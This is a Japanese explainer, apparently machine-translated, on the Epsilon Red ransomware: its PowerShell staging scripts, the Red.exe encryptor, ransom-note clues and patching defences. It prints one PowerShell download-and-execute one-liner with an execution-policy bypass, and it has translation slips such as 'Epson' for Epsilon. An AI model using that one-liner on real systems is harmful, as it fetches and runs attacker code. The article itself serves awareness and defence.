Epsilon Red ランサムウェアとは何ですか?

サーバーにパッチを適用しましたか?

Epsilon Red と呼ばれる新しいランサムウェアの脅威は、企業データ センター内のパッチが適用されていない Microsoft ベースのサーバーを標的としています。マーベルコミックのあまり知られていない悪役にちなんで名付けられたイプシロンレッドは、最近ソフォスというサイバーセキュリティ会社によって発見されました。ランサムウェアは発見以来、世界中の多くの組織を攻撃してきました。

ファイルレス ランサムウェアは PowerShell に「隠れる」

ファイルレス ランサムウェアは、正規のソフトウェアをバンドルすることによって実行されるマルウェアの一種です。PowerShellベースのファイルレス マルウェアは、PowerShell の機能を利用してデバイスのメモリに直接ロードします。この機能は、PowerShell スクリプト内のマルウェアを検出から保護するのに役立ちます。

一般的なシナリオでは、スクリプトを実行するときは、まずデバイスのドライブにスクリプトを書き込む必要があります。これにより、エンドポイント セキュリティ ソリューションがスクリプトを検出できるようになります。 PowerShell は標準のスクリプト実行プロセスから除外されているため、エンドポイント セキュリティをバイパスする可能性があります。さらに、PowerShell スクリプトでbypassパラメーターを使用すると、攻撃者がネットワーク スクリプトの制限を回避することができます。

PowerShell バイパス パラメーターの例は次のとおりです。

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

ご覧のとおり、PowerShell バイパス パラメーターの設計は比較的簡単です。

これに応じて、Microsoft は PowerShell に関連するリモート マルウェア実行の脆弱性に対処するパッチをリリースしました。ただし、パッチは使用した分だけ効果を発揮します。多くの組織はパッチ適用基準を緩和し、環境を攻撃に対して脆弱にしています。イプシロン レッドの設計は、そのレベルの脆弱性を利用することです。

イプシロンレッドの二重の有用性

Epsilon Red はパッチが適用されていない Microsoft サーバーに対して最も効果的であるため、このマルウェアはランサムウェアおよび識別ツールとして使用される可能性があります。 Epsilon が環境内で成功するかどうかにより、攻撃者はターゲットのセキュリティ機能についてより深い洞察を得ることができます。

Epsilon が Microsoft Exchange Server へのアクセスに成功した場合、組織が一般的なパッチ適用セキュリティのベスト プラクティスに従っていないことを示します。攻撃者にとって、これはターゲットの環境の残りの部分がいかに簡単に Epsilon によって侵害される可能性があるかを示しています。

Epsilon Red は難読化を使用してペイロードを隠します。難読化によりコードが判読できなくなり、PowerShell スクリプトの可読性が高くなるのを避けるために PowerShell マルウェアで使用されます。難読化では、PowerShell エイリアスコマンドレットを使用して、ウイルス対策ソフトウェアが PowerShell ログ内の悪意のあるスクリプトを識別するのを困難にします。

Epsilon Red は、パッチが適用されていない Microsoft サーバーに対して最も効果的です

ただし、難読化された PowerShell スクリプトは引き続き識別できます。差し迫った PowerShell スクリプト攻撃の一般的な兆候は、WebClient オブジェクトの作成です。攻撃者は、PowerShell コードで WebClient オブジェクトを作成し、悪意のあるコードを含むリモートURLへの外部接続を確立します。

組織が攻撃された場合、難読化された PowerShell スクリプトを検出するための十分なセキュリティ対策が講じられている可能性は非常に低いです。逆に、Epsilon Red がサーバーへの侵入に失敗した場合、ターゲットのネットワークが PowerShell マルウェアを迅速に復号できることが攻撃者に示され、攻撃の価値が低くなります。

イプシロンレッドのサイバー侵入

Epsilon Red の機能は非常にシンプルです。このソフトウェアは、一連の Powershell スクリプトを使用してサーバーに侵入します。これらの PowerShell スクリプトには、1.ps1から 12.ps1までの番号が付けられます。各 PowerShell スクリプトの設計は、最終ペイロード用に宛先サーバーを準備することです。

Epsilon Red のすべての PowerShell スクリプトには独自の目的があります。 Epsilon Red の PowerShell スクリプトの 1 つは、ターゲットのネットワーク ファイアウォール ルールを解決するように設計されています。このシリーズの別のソフトウェアは、ターゲットのウイルス対策ソフトウェアをアンインストールするように設計されています。

ご想像のとおり、これらのスクリプトは同期して動作し、ペイロードが配信されるとターゲットがその進行をすぐに停止できないようにします。

• Ryuk ランサムウェアとは何ですか?それを避けるにはどうすればよいでしょうか?

送信ペイロード

Epsilon の PowerShell スクリプトが最終ペイロードに移行すると、拡張機能Red.exeとして配布されます。 Red.exe はサーバーに侵入すると、サーバーのファイルをスキャンし、検出した各ファイルのディレクトリ パスのリストを作成します。リストの作成後、リスト内の各ディレクトリ パスのメイン マルウェア ファイルから子プロセスが作成されます。次に、各ランサムウェア サブファイルは、リスト ファイルからのディレクトリ パスを暗号化します。

エプソンのリストにあるすべてのフォルダー パスが暗号化された後、ターゲットに通知し、攻撃者の要求を記載する.txt ファイルが残されます。さらに、侵害されたサーバーに接続されているすべてのアクセス可能なネットワーク ノードが侵害され、マルウェアがネットワークに侵入する可能性が高まる可能性があります。

イプシロンレッドの背後にいるのは誰ですか?

イプシロンレッドの背後にいる攻撃者の身元はまだ不明です

イプシロン レッドの背後にいる攻撃者の身元はまだ不明です。ただし、攻撃者の出所を示す手がかりもいくつかあります。最初の手掛かりはマルウェアの名前です。イプシロン レッドは、ロシアに起源を持つ X-MEN の悪役です。

2 番目の手掛かりは、コードが残した .txt ファイルの身代金メモにあります。これは、REvil と呼ばれるランサムウェア集団が残したメモに似ています。ただし、この類似性は、攻撃者がこのギャングのメンバーであることを示すものではありません。 REvil は、関連会社がマルウェアへのアクセスに対して REvil に料金を支払う RaaS (サービスとしてのランサムウェア) オペレーションを運営しています。

イプシロンレッドから身を守る

これまでのところ、Epsilon Red はパッチが適用されていないサーバーへの侵入に成功しています。つまり、Epsilon Red や同様のランサムウェア マルウェアに対する最善の保護の 1 つは、環境が適切に管理されていることを確認することです。さらに、PowerShell スクリプトを迅速に復号できるセキュリティ ソリューションを環境に追加すると便利です。